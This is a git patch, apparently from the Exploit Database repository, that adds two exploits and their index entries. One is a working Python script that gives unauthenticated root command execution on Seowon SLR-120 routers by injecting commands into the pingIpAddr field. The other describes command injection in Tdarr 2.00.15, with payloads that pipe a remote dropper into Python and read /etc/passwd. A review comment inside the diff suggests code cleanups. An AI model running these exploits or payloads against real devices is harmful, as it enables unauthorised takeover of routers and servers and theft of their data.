From 653f886e0be5a632fcc95c558a3ee5e127f1a149 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 12 Mar 2022 05:01:35 +0000
Subject: [PATCH] DB: 2022-03-12 2 changes to exploits/shellcodes Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) Tdarr 2.00.15 - Command Injection
---
 exploits/hardware/remote/50821.py | 82 ++++++++++++++++++++++++++++++
 exploits/multiple/remote/50822.txt | 15 ++++++
 files_exploits.csv | 2 +
 3 files changed, 99 insertions(+)
 create mode 100755 exploits/hardware/remote/50821.py
 create mode 100644 exploits/multiple/remote/50822.txt
diff --git a/exploits/hardware/remote/50821.py b/exploits/hardware/remote/50821.py
new file mode 100755
index 000000000..63e854b47
--- /dev/null
+++ b/exploits/hardware/remote/50821.py
@@ -0,0 +1,82 @@
+# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
+# Date: 2022-03-11
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: http://www.seowonintech.co.kr
+# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
+# Version: All version
+# Tested on: Windows 10 Enterprise x64 , Linux
+# CVE : CVE-2020-17456
+
+# [ About - Seowon SLR-120 router ]:
+
+#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
+#The convenience of sharing wireless internet access invigorates your lifestyle, families,
+#friends and workmates. Carry it around to boost your active communication anywhere.
+
+# [ Description ]:
+
+#Execute commands without authentication as admin user ,
+#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.
+
+# [ Vulnerable products ]:
+
+#SLR-120S42G
+#SLR-120D42G
+#SLR-120T42G
+
+import requests
+
+print ('''
+###########################################################
+# Seowon SLR-120S42G router - RCE (Unauthenticated) #
+# BY:Aryan Chehreghani #
+# Team:TAPESH DIGITAL SECURITY TEAM IRAN #
+# mail:aryanchehreghani@yahoo.com #
+# -+-USE:python script.py #
+# Example Target : http://192.168.1.1:443/ #
+###########################################################
+''')
+
+url = input ("=> Enter Target : ")
+
+while(True):
+
+ try:
+
+ cmd = input ("~Enter Command $ ")
+
+ header = {
+"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
+"Accept": "*/*",
+"Accept-Language": "en-US,en;q:0.5",
+"Accept-Encoding": "gzip, deflate",
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": "207",
+"Origin": "http://192.168.1.1",
+"Connection": "close",
+"Referer": "http://192.168.1.1/",
+"Upgrade-Insecure-Requests": "1"
+}
+
+ datas = {
+'Command':'Diagnostic',
+'traceMode':'ping',
+'reportIpOnly':'',
+'pingIpAddr':';'+cmd,
+'pingPktSize':'56',
+'pingTimeout':'30',
+'pingCount':'4',
+'maxTTLCnt':'30',
+'queriesCnt':'3',
+'reportIpOnlyCheckbox':'on',
+'logarea':'com.cgi',
+'btnApply':'Apply',
+'T':'1646950471018'
+}
+
+ x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)
+
+ print(x.text)
+
+ except:
+ break
\ No newline at end of file
diff --git a/exploits/multiple/remote/50822.txt b/exploits/multiple/remote/50822.txt
new file mode 100644
index 000000000..0b012257b
--- /dev/null
+++ b/exploits/multiple/remote/50822.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Tdarr 2.00.15 - Command Injection
+# Date: 10/03/2022
+# Exploit Author: Sam Smith
+# Vendor Homepage: https://tdarr.io
+# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
+# Version: 2.00.15 (likely also older versions)
+# Tested on: 2.00.15
+
+Exploit:
+
+The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.
+
+eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.
+
+Tdarr is not protected by any auth by default and no credentials are required to trigger RCE
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 255d64cc3..bb3d82f8b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
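Review bot: The `header` dict in exploits/hardware/remote/50821.py is rebuilt on every pass of the loop but never handed to `requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)`, so it is dead code; two of its values are also malformed (`"Content-Length": "207"` is fixed regardless of the body, and `q:0.5` should read `q=0.5`), and deleting the dict is the cleaner fix. The bare `except:` before `break` ends the loop silently on any error, so a connection failure is indistinguishable from Ctrl-C; `except (KeyboardInterrupt, EOFError):` would keep the intended exit while letting real errors surface. The file header names CVE-2020-17456 but not the affected parameter; a comment such as `# Affected parameter: pingIpAddr in POST /cgi-bin/system_log.cgi (Command=Diagnostic); shell metacharacters in this field are the indicator to look for in request logs` would help readers building detections.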
@@ -18647,6 +18647,8 @@ id,file,description,date,author,type,platform,port
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
 50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
+50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
+50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,